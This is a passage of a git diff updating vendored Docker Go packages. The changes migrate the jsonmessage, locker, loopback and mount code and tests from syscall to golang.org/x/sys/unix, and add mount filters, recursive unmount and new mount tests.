now.UnixNano()).Format(RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(RFC3339NanoFixed)), }, // Stream over status - JSONMessage{ + { Status: "status", Stream: "stream", }: { @@ -118,7 +166,7 @@ func TestJSONMessageDisplay(t *testing.T) { "stream", }, // With progress message - JSONMessage{ + { Status: "status", ProgressMessage: "progressMessage", }: { @@ -126,13 +174,13 @@ func TestJSONMessageDisplay(t *testing.T) { "status progressMessage", }, // With progress, stream empty - JSONMessage{ + { Status: "status", Stream: "", Progress: &JSONProgress{Current: 1}, }: { "", - fmt.Sprintf("%c[2K\rstatus 1 B\r", 27), + fmt.Sprintf("%c[1K%c[K\rstatus 1B\r", 27, 27), }, } @@ -140,19 +188,19 @@ func TestJSONMessageDisplay(t *testing.T) { for jsonMessage, expectedMessages := range messages { // Without terminal data := bytes.NewBuffer([]byte{}) - if err := jsonMessage.Display(data, false); err != nil { + if err := jsonMessage.Display(data, nil); err != nil { t.Fatal(err) } if data.String() != expectedMessages[0] { - t.Fatalf("Expected [%v], got [%v]", expectedMessages[0], data.String()) + t.Fatalf("Expected %q,got %q", expectedMessages[0], data.String()) } // With terminal data = bytes.NewBuffer([]byte{}) - if err := jsonMessage.Display(data, true); err != nil { + if err := jsonMessage.Display(data, &noTermInfo{}); err != nil { t.Fatal(err) } if data.String() != expectedMessages[1] { - t.Fatalf("Expected [%v], got [%v]", expectedMessages[1], data.String()) + t.Fatalf("\nExpected %q\n got %q", expectedMessages[1], data.String()) } } } @@ -162,16 +210,14 @@ func TestJSONMessageDisplayWithJSONError(t *testing.T) { data := bytes.NewBuffer([]byte{}) jsonMessage := JSONMessage{Error: &JSONError{404, "Can't find it"}} - err := jsonMessage.Display(data, true) + err := jsonMessage.Display(data, &noTermInfo{}) if err == nil || err.Error() != "Can't find it" { - t.Fatalf("Expected a JSONError 404, got [%v]", err) + t.Fatalf("Expected a JSONError 404, got %q", err) } jsonMessage = JSONMessage{Error: &JSONError{401, "Anything"}} - err = jsonMessage.Display(data, true) - if err == nil || err.Error() != "Authentication is required." { - t.Fatalf("Expected an error [Authentication is required.], got [%v]", err) - } + err = jsonMessage.Display(data, &noTermInfo{}) + assert.Check(t, is.Error(err, "authentication is required")) } func TestDisplayJSONMessagesStreamInvalidJSON(t *testing.T) { @@ -183,7 +229,7 @@ func TestDisplayJSONMessagesStreamInvalidJSON(t *testing.T) { inFd, _ = term.GetFdInfo(reader) if err := DisplayJSONMessagesStream(reader, data, inFd, false, nil); err == nil && err.Error()[:17] != "invalid character" { - t.Fatalf("Should have thrown an error (invalid character in ..), got [%v]", err) + t.Fatalf("Should have thrown an error (invalid character in ..), got %q", err) } } @@ -215,9 +261,15 @@ func TestDisplayJSONMessagesStream(t *testing.T) { // With progressDetail "{ \"id\": \"ID\", \"status\": \"status\", \"progressDetail\": { \"Current\": 1} }": { "", // progressbar is disabled in non-terminal - fmt.Sprintf("\n%c[%dA%c[2K\rID: status 1 B\r%c[%dB", 27, 1, 27, 27, 1), + fmt.Sprintf("\n%c[%dA%c[1K%c[K\rID: status 1B\r%c[%dB", 27, 1, 27, 27, 27, 1), }, } + + // Use $TERM which is unlikely to exist, forcing DisplayJSONMessageStream to + // (hopefully) use &noTermInfo. + origTerm := os.Getenv("TERM") + os.Setenv("TERM", "xyzzy-non-existent-terminfo") + for jsonMessage, expectedMessages := range messages { data := bytes.NewBuffer([]byte{}) reader := strings.NewReader(jsonMessage) @@ -228,7 +280,7 @@ func TestDisplayJSONMessagesStream(t *testing.T) { t.Fatal(err) } if data.String() != expectedMessages[0] { - t.Fatalf("Expected an [%v], got [%v]", expectedMessages[0], data.String()) + t.Fatalf("Expected an %q, got %q", expectedMessages[0], data.String()) } // With terminal @@ -238,8 +290,9 @@ func TestDisplayJSONMessagesStream(t *testing.T) { t.Fatal(err) } if data.String() != expectedMessages[1] { - t.Fatalf("Expected an [%v], got [%v]", expectedMessages[1], data.String()) + t.Fatalf("\nExpected %q\n got %q", expectedMessages[1], data.String()) } } + os.Setenv("TERM", origTerm) } diff --git a/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go b/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go deleted file mode 100644 index ff833e3741..0000000000 --- a/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go +++ /dev/null @@ -1,31 +0,0 @@ -package listeners - -import ( - "crypto/tls" - "fmt" - "net" - - "github.com/docker/go-connections/sockets" -) - -// Init creates new listeners for the server. -func Init(proto, addr, socketGroup string, tlsConfig *tls.Config) (ls []net.Listener, err error) { - switch proto { - case "tcp": - l, err := sockets.NewTCPSocket(addr, tlsConfig) - if err != nil { - return nil, err - } - ls = append(ls, l) - case "unix": - l, err := sockets.NewUnixSocket(addr, socketGroup) - if err != nil { - return nil, fmt.Errorf("can't create unix socket %s: %v", addr, err) - } - ls = append(ls, l) - default: - return nil, fmt.Errorf("Invalid protocol format: %q", proto) - } - - return -} diff --git a/vendor/github.com/docker/docker/pkg/locker/README.md b/vendor/github.com/docker/docker/pkg/locker/README.md index e84a815cc5..ce787aefb3 100644 --- a/vendor/github.com/docker/docker/pkg/locker/README.md +++ b/vendor/github.com/docker/docker/pkg/locker/README.md @@ -4,7 +4,7 @@ Locker locker provides a mechanism for creating finer-grained locking to help free up more global locks to handle other tasks. -The implementation looks close to a sync.Mutex, however the user must provide a +The implementation looks close to a sync.Mutex, however, the user must provide a reference to use to refer to the underlying lock when locking and unlocking, and unlock may generate an error. @@ -35,7 +35,7 @@ type important struct { func (i *important) Get(name string) interface{} { i.locks.Lock(name) defer i.locks.Unlock(name) - return data[name] + return i.data[name] } func (i *important) Create(name string, data interface{}) { @@ -44,9 +44,9 @@ func (i *important) Create(name string, data interface{}) { i.createImportant(data) - s.mu.Lock() + i.mu.Lock() i.data[name] = data - s.mu.Unlock() + i.mu.Unlock() } func (i *important) createImportant(data interface{}) { @@ -59,7 +59,7 @@ function (or before doing anything with the underlying state), this ensures any other function that is dealing with the same name will block. When needing to modify the underlying data, use the global lock to ensure nothing -else is modfying it at the same time. +else is modifying it at the same time. Since name lock is already in place, no reads will occur while the modification is being performed. diff --git a/vendor/github.com/docker/docker/pkg/locker/locker.go b/vendor/github.com/docker/docker/pkg/locker/locker.go index 0b22ddfab8..dbd47fc465 100644 --- a/vendor/github.com/docker/docker/pkg/locker/locker.go +++ b/vendor/github.com/docker/docker/pkg/locker/locker.go @@ -11,7 +11,7 @@ created. Lock references are automatically cleaned up on `Unlock` if nothing else is waiting for the lock. */ -package locker +package locker // import "github.com/docker/docker/pkg/locker" import ( "errors" diff --git a/vendor/github.com/docker/docker/pkg/locker/locker_test.go b/vendor/github.com/docker/docker/pkg/locker/locker_test.go index 5a297dd47b..2b0a8a55d6 100644 --- a/vendor/github.com/docker/docker/pkg/locker/locker_test.go +++ b/vendor/github.com/docker/docker/pkg/locker/locker_test.go @@ -1,6 +1,8 @@ -package locker +package locker // import "github.com/docker/docker/pkg/locker" import ( + "math/rand" + "strconv" "sync" "testing" "time" @@ -122,3 +124,38 @@ func TestLockerConcurrency(t *testing.T) { t.Fatalf("lock should not exist: %v", ctr) } } + +func BenchmarkLocker(b *testing.B) { + l := New() + for i := 0; i < b.N; i++ { + l.Lock("test") + l.Unlock("test") + } +} + +func BenchmarkLockerParallel(b *testing.B) { + l := New() + b.SetParallelism(128) + b.RunParallel(func(pb *testing.PB) { + for pb.Next() { + l.Lock("test") + l.Unlock("test") + } + }) +} + +func BenchmarkLockerMoreKeys(b *testing.B) { + l := New() + var keys []string + for i := 0; i < 64; i++ { + keys = append(keys, strconv.Itoa(i)) + } + b.SetParallelism(128) + b.RunParallel(func(pb *testing.PB) { + for pb.Next() { + k := keys[rand.Intn(len(keys))] + l.Lock(k) + l.Unlock(k) + } + }) +} diff --git a/vendor/github.com/docker/docker/pkg/longpath/longpath.go b/vendor/github.com/docker/docker/pkg/longpath/longpath.go index 9b15bfff4c..4177affba2 100644 --- a/vendor/github.com/docker/docker/pkg/longpath/longpath.go +++ b/vendor/github.com/docker/docker/pkg/longpath/longpath.go @@ -2,7 +2,7 @@ // in Windows, which are expected to be prepended with `\\?\` and followed by either // a drive letter, a UNC server\share, or a volume identifier. -package longpath +package longpath // import "github.com/docker/docker/pkg/longpath" import ( "strings" diff --git a/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go b/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go index 01865eff09..2bcd008e10 100644 --- a/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go +++ b/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go @@ -1,4 +1,4 @@ -package longpath +package longpath // import "github.com/docker/docker/pkg/longpath" import ( "strings" diff --git a/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go b/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go index 971f45eb48..94feb8fc7d 100644 --- a/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go +++ b/vendor/github.com/docker/docker/pkg/loopback/attach_loopback.go @@ -1,14 +1,14 @@ -// +build linux +// +build linux,cgo -package loopback +package loopback // import "github.com/docker/docker/pkg/loopback" import ( "errors" "fmt" "os" - "syscall" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) // Loopback related errors @@ -69,7 +69,7 @@ func openNextAvailableLoopback(index int, sparseFile *os.File) (loopFile *os.Fil loopFile.Close() // If the error is EBUSY, then try the next loopback - if err != syscall.EBUSY { + if err != unix.EBUSY { logrus.Errorf("Cannot set up loopback device %s: %s", target, err) return nil, ErrAttachLoopbackDevice } diff --git a/vendor/github.com/docker/docker/pkg/loopback/ioctl.go b/vendor/github.com/docker/docker/pkg/loopback/ioctl.go index 0714eb5f87..612fd00abe 100644 --- a/vendor/github.com/docker/docker/pkg/loopback/ioctl.go +++ b/vendor/github.com/docker/docker/pkg/loopback/ioctl.go @@ -1,36 +1,34 @@ -// +build linux +// +build linux,cgo -package loopback +package loopback // import "github.com/docker/docker/pkg/loopback" import ( - "syscall" "unsafe" + + "golang.org/x/sys/unix" ) func ioctlLoopCtlGetFree(fd uintptr) (int, error) { - index, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, LoopCtlGetFree, 0) - if err != 0 { + index, err := unix.IoctlGetInt(int(fd), LoopCtlGetFree) + if err != nil { return 0, err } - return int(index), nil + return index, nil } func ioctlLoopSetFd(loopFd, sparseFd uintptr) error { - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetFd, sparseFd); err != 0 { - return err - } - return nil + return unix.IoctlSetInt(int(loopFd), LoopSetFd, int(sparseFd)) } func ioctlLoopSetStatus64(loopFd uintptr, loopInfo *loopInfo64) error { - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetStatus64, uintptr(unsafe.Pointer(loopInfo))); err != 0 { + if _, _, err := unix.Syscall(unix.SYS_IOCTL, loopFd, LoopSetStatus64, uintptr(unsafe.Pointer(loopInfo))); err != 0 { return err } return nil } func ioctlLoopClrFd(loopFd uintptr) error { - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopClrFd, 0); err != 0 { + if _, _, err := unix.Syscall(unix.SYS_IOCTL, loopFd, LoopClrFd, 0); err != 0 { return err } return nil @@ -39,15 +37,12 @@ func ioctlLoopClrFd(loopFd uintptr) error { func ioctlLoopGetStatus64(loopFd uintptr) (*loopInfo64, error) { loopInfo := &loopInfo64{} - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopGetStatus64, uintptr(unsafe.Pointer(loopInfo))); err != 0 { + if _, _, err := unix.Syscall(unix.SYS_IOCTL, loopFd, LoopGetStatus64, uintptr(unsafe.Pointer(loopInfo))); err != 0 { return nil, err } return loopInfo, nil } func ioctlLoopSetCapacity(loopFd uintptr, value int) error { - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, loopFd, LoopSetCapacity, uintptr(value)); err != 0 { - return err - } - return nil + return unix.IoctlSetInt(int(loopFd), LoopSetCapacity, value) } diff --git a/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go b/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go index e1100ce156..7206bfb950 100644 --- a/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go +++ b/vendor/github.com/docker/docker/pkg/loopback/loop_wrapper.go @@ -1,6 +1,6 @@ -// +build linux +// +build linux,cgo -package loopback +package loopback // import "github.com/docker/docker/pkg/loopback" /* #include // FIXME: present only for defines, maybe we can remove it? diff --git a/vendor/github.com/docker/docker/pkg/loopback/loopback.go b/vendor/github.com/docker/docker/pkg/loopback/loopback.go index bc0479284c..086655bc1a 100644 --- a/vendor/github.com/docker/docker/pkg/loopback/loopback.go +++ b/vendor/github.com/docker/docker/pkg/loopback/loopback.go @@ -1,13 +1,13 @@ -// +build linux +// +build linux,cgo -package loopback +package loopback // import "github.com/docker/docker/pkg/loopback" import ( "fmt" "os" - "syscall" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func getLoopbackBackingFile(file *os.File) (uint64, uint64, error) { @@ -31,12 +31,13 @@ func SetCapacity(file *os.File) error { // FindLoopDeviceFor returns a loopback device file for the specified file which // is backing file of a loop back device. func FindLoopDeviceFor(file *os.File) *os.File { - stat, err := file.Stat() + var stat unix.Stat_t + err := unix.Stat(file.Name(), &stat) if err != nil { return nil } - targetInode := stat.Sys().(*syscall.Stat_t).Ino - targetDevice := stat.Sys().(*syscall.Stat_t).Dev + targetInode := stat.Ino + targetDevice := stat.Dev for i := 0; true; i++ { path := fmt.Sprintf("/dev/loop%d", i) diff --git a/vendor/github.com/docker/docker/pkg/mount/flags.go b/vendor/github.com/docker/docker/pkg/mount/flags.go index 607dbed43a..272363b685 100644 --- a/vendor/github.com/docker/docker/pkg/mount/flags.go +++ b/vendor/github.com/docker/docker/pkg/mount/flags.go @@ -1,4 +1,4 @@ -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go b/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go index f166cb2f77..ef35ef9059 100644 --- a/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go +++ b/vendor/github.com/docker/docker/pkg/mount/flags_freebsd.go @@ -1,6 +1,6 @@ // +build freebsd,cgo -package mount +package mount // import "github.com/docker/docker/pkg/mount" /* #include @@ -45,4 +45,5 @@ const ( RELATIME = 0 REMOUNT = 0 STRICTATIME = 0 + mntDetach = 0 ) diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_linux.go b/vendor/github.com/docker/docker/pkg/mount/flags_linux.go index dc696dce90..a1b199a31a 100644 --- a/vendor/github.com/docker/docker/pkg/mount/flags_linux.go +++ b/vendor/github.com/docker/docker/pkg/mount/flags_linux.go @@ -1,85 +1,87 @@ -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( - "syscall" + "golang.org/x/sys/unix" ) const ( // RDONLY will mount the file system read-only. - RDONLY = syscall.MS_RDONLY + RDONLY = unix.MS_RDONLY // NOSUID will not allow set-user-identifier or set-group-identifier bits to // take effect. - NOSUID = syscall.MS_NOSUID + NOSUID = unix.MS_NOSUID // NODEV will not interpret character or block special devices on the file // system. - NODEV = syscall.MS_NODEV + NODEV = unix.MS_NODEV // NOEXEC will not allow execution of any binaries on the mounted file system. - NOEXEC = syscall.MS_NOEXEC + NOEXEC = unix.MS_NOEXEC // SYNCHRONOUS will allow I/O to the file system to be done synchronously. - SYNCHRONOUS = syscall.MS_SYNCHRONOUS + SYNCHRONOUS = unix.MS_SYNCHRONOUS // DIRSYNC will force all directory updates within the file system to be done // synchronously. This affects the following system calls: create, link, // unlink, symlink, mkdir, rmdir, mknod and rename. - DIRSYNC = syscall.MS_DIRSYNC + DIRSYNC = unix.MS_DIRSYNC // REMOUNT will attempt to remount an already-mounted file system. This is // commonly used to change the mount flags for a file system, especially to // make a readonly file system writeable. It does not change device or mount // point. - REMOUNT = syscall.MS_REMOUNT + REMOUNT = unix.MS_REMOUNT // MANDLOCK will force mandatory locks on a filesystem. - MANDLOCK = syscall.MS_MANDLOCK + MANDLOCK = unix.MS_MANDLOCK // NOATIME will not update the file access time when reading from a file. - NOATIME = syscall.MS_NOATIME + NOATIME = unix.MS_NOATIME // NODIRATIME will not update the directory access time. - NODIRATIME = syscall.MS_NODIRATIME + NODIRATIME = unix.MS_NODIRATIME // BIND remounts a subtree somewhere else. - BIND = syscall.MS_BIND + BIND = unix.MS_BIND // RBIND remounts a subtree and all possible submounts somewhere else. - RBIND = syscall.MS_BIND | syscall.MS_REC + RBIND = unix.MS_BIND | unix.MS_REC // UNBINDABLE creates a mount which cannot be cloned through a bind operation. - UNBINDABLE = syscall.MS_UNBINDABLE + UNBINDABLE = unix.MS_UNBINDABLE // RUNBINDABLE marks the entire mount tree as UNBINDABLE. - RUNBINDABLE = syscall.MS_UNBINDABLE | syscall.MS_REC + RUNBINDABLE = unix.MS_UNBINDABLE | unix.MS_REC // PRIVATE creates a mount which carries no propagation abilities. - PRIVATE = syscall.MS_PRIVATE + PRIVATE = unix.MS_PRIVATE // RPRIVATE marks the entire mount tree as PRIVATE. - RPRIVATE = syscall.MS_PRIVATE | syscall.MS_REC + RPRIVATE = unix.MS_PRIVATE | unix.MS_REC // SLAVE creates a mount which receives propagation from its master, but not // vice versa. - SLAVE = syscall.MS_SLAVE + SLAVE = unix.MS_SLAVE // RSLAVE marks the entire mount tree as SLAVE. - RSLAVE = syscall.MS_SLAVE | syscall.MS_REC + RSLAVE = unix.MS_SLAVE | unix.MS_REC // SHARED creates a mount which provides the ability to create mirrors of // that mount such that mounts and unmounts within any of the mirrors // propagate to the other mirrors. - SHARED = syscall.MS_SHARED + SHARED = unix.MS_SHARED // RSHARED marks the entire mount tree as SHARED. - RSHARED = syscall.MS_SHARED | syscall.MS_REC + RSHARED = unix.MS_SHARED | unix.MS_REC // RELATIME updates inode access times relative to modify or change time. - RELATIME = syscall.MS_RELATIME + RELATIME = unix.MS_RELATIME // STRICTATIME allows to explicitly request full atime updates. This makes // it possible for the kernel to default to relatime or noatime but still // allow userspace to override it. - STRICTATIME = syscall.MS_STRICTATIME + STRICTATIME = unix.MS_STRICTATIME + + mntDetach = unix.MNT_DETACH ) diff --git a/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go index 5564f7b3cd..cc6c475908 100644 --- a/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/mount/flags_unsupported.go @@ -1,6 +1,6 @@ -// +build !linux,!freebsd freebsd,!cgo solaris,!cgo +// +build !linux,!freebsd freebsd,!cgo -package mount +package mount // import "github.com/docker/docker/pkg/mount" // These flags are unsupported. const ( @@ -27,4 +27,5 @@ const ( STRICTATIME = 0 SYNCHRONOUS = 0 RDONLY = 0 + mntDetach = 0 ) diff --git a/vendor/github.com/docker/docker/pkg/mount/mount.go b/vendor/github.com/docker/docker/pkg/mount/mount.go index 66ac4bf472..874aff6545 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mount.go +++ b/vendor/github.com/docker/docker/pkg/mount/mount.go @@ -1,29 +1,66 @@ -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( - "time" + "sort" + "strings" + "syscall" + + "github.com/sirupsen/logrus" ) -// GetMounts retrieves a list of mounts for the current running process. -func GetMounts() ([]*Info, error) { - return parseMountTable() +// FilterFunc is a type defining a callback function +// to filter out unwanted entries. It takes a pointer +// to an Info struct (not fully populated, currently +// only Mountpoint is filled in), and returns two booleans: +// - skip: true if the entry should be skipped +// - stop: true if parsing should be stopped after the entry +type FilterFunc func(*Info) (skip, stop bool) + +// PrefixFilter discards all entries whose mount points +// do not start with a prefix specified +func PrefixFilter(prefix string) FilterFunc { + return func(m *Info) (bool, bool) { + skip := !strings.HasPrefix(m.Mountpoint, prefix) + return skip, false + } +} + +// SingleEntryFilter looks for a specific entry +func SingleEntryFilter(mp string) FilterFunc { + return func(m *Info) (bool, bool) { + if m.Mountpoint == mp { + return false, true // don't skip, stop now + } + return true, false // skip, keep going + } +} + +// ParentsFilter returns all entries whose mount points +// can be parents of a path specified, discarding others. +// For example, given `/var/lib/docker/something`, entries +// like `/var/lib/docker`, `/var` and `/` are returned. +func ParentsFilter(path string) FilterFunc { + return func(m *Info) (bool, bool) { + skip := !strings.HasPrefix(path, m.Mountpoint) + return skip, false + } +} + +// GetMounts retrieves a list of mounts for the current running process, +// with an optional filter applied (use nil for no filter). +func GetMounts(f FilterFunc) ([]*Info, error) { + return parseMountTable(f) } // Mounted determines if a specified mountpoint has been mounted. -// On Linux it looks at /proc/self/mountinfo and on Solaris at mnttab. +// On Linux it looks at /proc/self/mountinfo. func Mounted(mountpoint string) (bool, error) { - entries, err := parseMountTable() + entries, err := GetMounts(SingleEntryFilter(mountpoint)) if err != nil { return false, err } - // Search the table for the mountpoint - for _, e := range entries { - if e.Mountpoint == mountpoint { - return true, nil - } - } - return false, nil + return len(entries) > 0, nil } // Mount will mount filesystem according to the specified configuration, on the @@ -46,29 +83,59 @@ func Mount(device, target, mType, options string) error { // flags.go for supported option flags. func ForceMount(device, target, mType, options string) error { flag, data := parseOptions(options) - if err := mount(device, target, mType, uintptr(flag), data); err != nil { - return err - } - return nil + return mount(device, target, mType, uintptr(flag), data) } -// Unmount will unmount the target filesystem, so long as it is mounted. +// Unmount lazily unmounts a filesystem on supported platforms, otherwise +// does a normal unmount. func Unmount(target string) error { - if mounted, err := Mounted(target); err != nil || !mounted { - return err + err := unmount(target, mntDetach) + if err == syscall.EINVAL { + // ignore "not mounted" error + err = nil } - return ForceUnmount(target) + return err } -// ForceUnmount will force an unmount of the target filesystem, regardless if -// it is mounted or not. -func ForceUnmount(target string) (err error) { - // Simple retry logic for unmount - for i := 0; i < 10; i++ { - if err = unmount(target, 0); err == nil { - return nil +// RecursiveUnmount unmounts the target and all mounts underneath, starting with +// the deepsest mount first. +func RecursiveUnmount(target string) error { + mounts, err := parseMountTable(PrefixFilter(target)) + if err != nil { + return err + } + + // Make the deepest mount be first + sort.Slice(mounts, func(i, j int) bool { + return len(mounts[i].Mountpoint) > len(mounts[j].Mountpoint) + }) + + for i, m := range mounts { + logrus.Debugf("Trying to unmount %s", m.Mountpoint) + err = unmount(m.Mountpoint, mntDetach) + if err != nil { + // If the error is EINVAL either this whole package is wrong (invalid flags passed to unmount(2)) or this is + // not a mountpoint (which is ok in this case). + // Meanwhile calling `Mounted()` is very expensive. + // + // We've purposefully used `syscall.EINVAL` here instead of `unix.EINVAL` to avoid platform branching + // Since `EINVAL` is defined for both Windows and Linux in the `syscall` package (and other platforms), + // this is nicer than defining a custom value that we can refer to in each platform file. + if err == syscall.EINVAL { + continue + } + if i == len(mounts)-1 { + if mounted, e := Mounted(m.Mountpoint); e != nil || mounted { + return err + } + continue + } + // This is some submount, we can ignore this error for now, the final unmount will fail if this is a real problem + logrus.WithError(err).Warnf("Failed to unmount submount %s", m.Mountpoint) + continue } - time.Sleep(100 * time.Millisecond) + + logrus.Debugf("Unmounted %s", m.Mountpoint) } - return + return nil } diff --git a/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go b/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go index 253aff3b8e..befff9d50c 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go @@ -1,6 +1,6 @@ -// +build !windows,!solaris +// +build !windows -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( "os" @@ -25,6 +25,10 @@ func TestMountOptionsParsing(t *testing.T) { } func TestMounted(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") + } + tmp := path.Join(os.TempDir(), "mount-tests") if err := os.MkdirAll(tmp, 0777); err != nil { t.Fatal(err) @@ -76,6 +80,10 @@ func TestMounted(t *testing.T) { } func TestMountReadonly(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") + } + tmp := path.Join(os.TempDir(), "mount-tests") if err := os.MkdirAll(tmp, 0777); err != nil { t.Fatal(err) @@ -121,7 +129,7 @@ func TestMountReadonly(t *testing.T) { } func TestGetMounts(t *testing.T) { - mounts, err := GetMounts() + mounts, err := GetMounts(nil) if err != nil { t.Fatal(err) } diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go b/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go index bb870e6f59..b6ab83a230 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go +++ b/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go @@ -1,4 +1,4 @@ -package mount +package mount // import "github.com/docker/docker/pkg/mount" /* #include @@ -13,8 +13,9 @@ import "C" import ( "fmt" "strings" - "syscall" "unsafe" + + "golang.org/x/sys/unix" ) func allocateIOVecs(options []string) []C.struct_iovec { @@ -55,5 +56,5 @@ func mount(device, target, mType string, flag uintptr, data string) error { } func unmount(target string, flag int) error { - return syscall.Unmount(target, flag) + return unix.Unmount(target, flag) } diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go b/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go index dd4280c777..631daf10a5 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go +++ b/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go @@ -1,21 +1,57 @@ -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( - "syscall" + "golang.org/x/sys/unix" ) -func mount(device, target, mType string, flag uintptr, data string) error { - if err := syscall.Mount(device, target, mType, flag, data); err != nil { - return err +const ( + // ptypes is the set propagation types. + ptypes = unix.MS_SHARED | unix.MS_PRIVATE | unix.MS_SLAVE | unix.MS_UNBINDABLE + + // pflags is the full set valid flags for a change propagation call. + pflags = ptypes | unix.MS_REC | unix.MS_SILENT + + // broflags is the combination of bind and read only + broflags = unix.MS_BIND | unix.MS_RDONLY +) + +// isremount returns true if either device name or flags identify a remount request, false otherwise. +func isremount(device string, flags uintptr) bool { + switch { + // We treat device "" and "none" as a remount request to provide compatibility with + // requests that don't explicitly set MS_REMOUNT such as those manipulating bind mounts. + case flags&unix.MS_REMOUNT != 0, device == "", device == "none": + return true + default: + return false + } +} + +func mount(device, target, mType string, flags uintptr, data string) error { + oflags := flags &^ ptypes + if !isremount(device, flags) || data != "" { + // Initial call applying all non-propagation flags for mount + // or remount with changed data + if err := unix.Mount(device, target, mType, oflags, data); err != nil { + return err + } } - // If we have a bind mount or remount, remount... - if flag&syscall.MS_BIND == syscall.MS_BIND && flag&syscall.MS_RDONLY == syscall.MS_RDONLY { - return syscall.Mount(device, target, mType, flag|syscall.MS_REMOUNT, data) + if flags&ptypes != 0 { + // Change the propagation type. + if err := unix.Mount("", target, "", flags&pflags, ""); err != nil { + return err + } } + + if oflags&broflags == broflags { + // Remount the bind to apply read only. + return unix.Mount("", target, "", oflags|unix.MS_REMOUNT, "") + } + return nil } func unmount(target string, flag int) error { - return syscall.Unmount(target, flag) + return unix.Unmount(target, flag) } diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_linux_test.go b/vendor/github.com/docker/docker/pkg/mount/mounter_linux_test.go new file mode 100644 index 0000000000..336f3d5cdc --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mounter_linux_test.go @@ -0,0 +1,228 @@ +// +build linux + +package mount // import "github.com/docker/docker/pkg/mount" + +import ( + "fmt" + "io/ioutil" + "os" + "strings" + "testing" +) + +func TestMount(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") + } + + source, err := ioutil.TempDir("", "mount-test-source-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(source) + + // Ensure we have a known start point by mounting tmpfs with given options + if err := Mount("tmpfs", source, "tmpfs", "private"); err != nil { + t.Fatal(err) + } + defer ensureUnmount(t, source) + validateMount(t, source, "", "", "") + if t.Failed() { + t.FailNow() + } + + target, err := ioutil.TempDir("", "mount-test-target-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(target) + + tests := []struct { + source string + ftype string + options string + expectedOpts string + expectedOptional string + expectedVFS string + }{ + // No options + {"tmpfs", "tmpfs", "", "", "", ""}, + // Default rw / ro test + {source, "", "bind", "", "", ""}, + {source, "", "bind,private", "", "", ""}, + {source, "", "bind,shared", "", "shared", ""}, + {source, "", "bind,slave", "", "master", ""}, + {source, "", "bind,unbindable", "", "unbindable", ""}, + // Read Write tests + {source, "", "bind,rw", "rw", "", ""}, + {source, "", "bind,rw,private", "rw", "", ""}, + {source, "", "bind,rw,shared", "rw", "shared", ""}, + {source, "", "bind,rw,slave", "rw", "master", ""}, + {source, "", "bind,rw,unbindable", "rw", "unbindable", ""}, + // Read Only tests + {source, "", "bind,ro", "ro", "", ""}, + {source, "", "bind,ro,private", "ro", "", ""}, + {source, "", "bind,ro,shared", "ro", "shared", ""}, + {source, "", "bind,ro,slave", "ro", "master", ""}, + {source, "", "bind,ro,unbindable", "ro", "unbindable", ""}, + // Remount tests to change per filesystem options + {"", "", "remount,size=128k", "rw", "", "rw,size=128k"}, + {"", "", "remount,ro,size=128k", "ro", "", "ro,size=128k"}, + } + + for _, tc := range tests { + ftype, options := tc.ftype, tc.options + if tc.ftype == "" { + ftype = "none" + } + if tc.options == "" { + options = "none" + } + + t.Run(fmt.Sprintf("%v-%v", ftype, options), func(t *testing.T) { + if strings.Contains(tc.options, "slave") { + // Slave requires a shared source + if err := MakeShared(source); err != nil { + t.Fatal(err) + } + defer func() { + if err := MakePrivate(source); err != nil { + 